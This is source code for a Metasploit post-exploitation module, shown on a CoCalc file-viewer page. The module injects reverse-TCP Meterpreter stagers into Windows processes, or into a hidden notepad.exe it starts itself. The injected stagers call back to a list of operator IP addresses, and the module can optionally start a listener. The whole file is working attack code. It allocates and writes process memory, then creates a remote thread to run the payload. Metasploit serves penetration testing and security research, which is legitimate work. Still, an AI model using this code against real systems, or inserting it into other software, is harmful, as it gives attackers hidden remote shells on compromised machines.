CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/manage/multi_meterpreter_inject.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7


8
  def initialize(info = {})

9
    super(

10
      update_info(

11
        info,

12
        'Name' => 'Windows Manage Inject in Memory Multiple Payloads',

13
        'Description' => %q{

14
          This module will inject in to several processes a given

15
          payload and connecting to a given list of IP Addresses.

16
          The module works with a given lists of IP Addresses and

17
          process PIDs if no PID is given it will start a the given

18
          process in the advanced options and inject the selected

19
          payload in to the memory of the created module.

20
        },

21
        'License' => MSF_LICENSE,

22
        'Author' => [

23
          'Carlos Perez <carlos_perez[at]darkoperator.com>',

24
          'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>' # added multiple payload support

25
        ],

26
        'Platform' => [ 'win' ],

27
        'SessionTypes' => [ 'meterpreter'],

28
        'Compat' => {

29
          'Meterpreter' => {

30
            'Commands' => %w[

31
              stdapi_sys_process_attach

32
              stdapi_sys_process_execute

33
              stdapi_sys_process_memory_allocate

34
              stdapi_sys_process_memory_write

35
              stdapi_sys_process_thread_create

36
            ]

37
          }

38
        }

39
      )

40
    )

41


42
    register_options(

43
      [

44
        OptString.new('PAYLOAD', [false, 'Payload to inject in to process memory', 'windows/meterpreter/reverse_tcp']),

45
        OptInt.new('LPORT', [false, 'Port number for the payload LPORT variable.', 4444]),

46
        OptString.new('IPLIST', [true, 'List of semicolon separated IP list.', Rex::Socket.source_address('1.2.3.4')]),

47
        OptString.new('PIDLIST', [false, 'List of semicolon separated PID list.', '']),

48
        OptBool.new('HANDLER', [false, 'Start new exploit/multi/handler job on local box.', false]),

49
        OptInt.new('AMOUNT', [false, 'Select the amount of shells you want to spawn.', 1])

50
      ]

51
    )

52


53
    register_advanced_options(

54
      [

55
        OptString.new('PROCESSNAME', [false, 'Description', 'notepad.exe'])

56
      ]

57
    )

58
  end

59


60
  # Run Method for when run command is issued

61
  def run

62
    unless session.platform == 'windows' && [ARCH_X64, ARCH_X86].include?(session.arch)

63
      print_error('This module requires native Windows meterpreter functions not compatible with the selected session')

64
      return

65
    end

66
    # Set variables

67
    multi_ip = nil

68
    multi_pid = nil

69


70
    print_status("Running module against #{sysinfo['Computer']}")

71


72
    if datastore['HANDLER']

73
      create_multi_handler(datastore['PAYLOAD'], datastore['LPORT'])

74
    end

75


76
    multi_ip = datastore['IPLIST'].split(';')

77
    multi_pid = datastore['PIDLIST'].split(';')

78


79
    datastore['AMOUNT'].times do # iterate through number of shells

80
      multi_ip.zip(multi_pid).each do |a|

81
        # Check if we have an IP for the session

82
        payload = create_payload(datastore['PAYLOAD'], a[0], datastore['LPORT'])

83
        if a[1]

84
          inject(a[1], payload)

85
        else

86
          # if no PID we create a process to host the Meterpreter session

87
          pid_num = start_proc(datastore['PROCESSNAME'])

88
          inject(pid_num, payload)

89
        end

90
        select(nil, nil, nil, 5)

91
      end

92
    end

93
  end

94


95
  # Function for injecting payload in to a given PID

96
  #-------------------------------------------------------------------------------

97
  def inject(target_pid, payload_to_inject)

98
    print_status("Injecting meterpreter into process ID #{target_pid}")

99
    begin

100
      host_process = session.sys.process.open(target_pid.to_i, PROCESS_ALL_ACCESS)

101
      raw = payload_to_inject.generate

102
      mem = host_process.memory.allocate(raw.length + (raw.length % 1024))

103


104
      print_status("Allocated memory at address #{'0x%.8x' % mem}, for #{raw.length} byte stager")

105
      print_status('Writing the stager into memory...')

106
      host_process.memory.write(mem, raw)

107
      host_process.thread.create(mem, 0)

108
      print_good("Successfully injected Meterpreter in to process: #{target_pid}")

109
    rescue ::Exception => e

110
      print_error("Failed to Inject Payload to #{target_pid}!")

111
      print_error(e.message)

112
    end

113
  end

114


115
  # Function for Creation of Connection Handler

116
  #-------------------------------------------------------------------------------

117
  def create_multi_handler(payload_to_inject, rport, rhost = '0.0.0.0')

118
    print_status("Starting connection handler at port #{rport} for #{payload_to_inject}")

119
    mul = client.framework.exploits.create('multi/handler')

120
    mul.datastore['WORKSPACE'] = session.workspace

121
    mul.datastore['PAYLOAD'] = payload_to_inject

122
    mul.datastore['LHOST'] = rhost

123
    mul.datastore['LPORT'] = rport

124
    mul.datastore['EXITFUNC'] = 'process'

125
    mul.datastore['ExitOnSession'] = false

126


127
    mul.exploit_simple(

128
      'Payload' => mul.datastore['PAYLOAD'],

129
      'RunAsJob' => true

130
    )

131
    print_good('exploit/multi/handler started!')

132
  end

133


134
  # Function for Creating the Payload

135
  #-------------------------------------------------------------------------------

136
  def create_payload(payload_type, lhost, lport)

137
    print_status("Creating a reverse meterpreter stager: LHOST=#{lhost} LPORT=#{lport}")

138
    payload = payload_type

139
    pay = client.framework.payloads.create(payload)

140
    pay.datastore['LHOST'] = lhost

141
    pay.datastore['LPORT'] = lport

142
    return pay

143
  end

144


145
  # Function starting notepad.exe process

146
  #-------------------------------------------------------------------------------

147
  def start_proc(proc_name)

148
    print_good('Starting Notepad.exe to house Meterpreter Session.')

149
    proc = client.sys.process.execute(proc_name, nil, { 'Hidden' => true })

150
    print_good("Process created with pid #{proc.pid}")

151
    return proc.pid

152
  end

153
end

154


155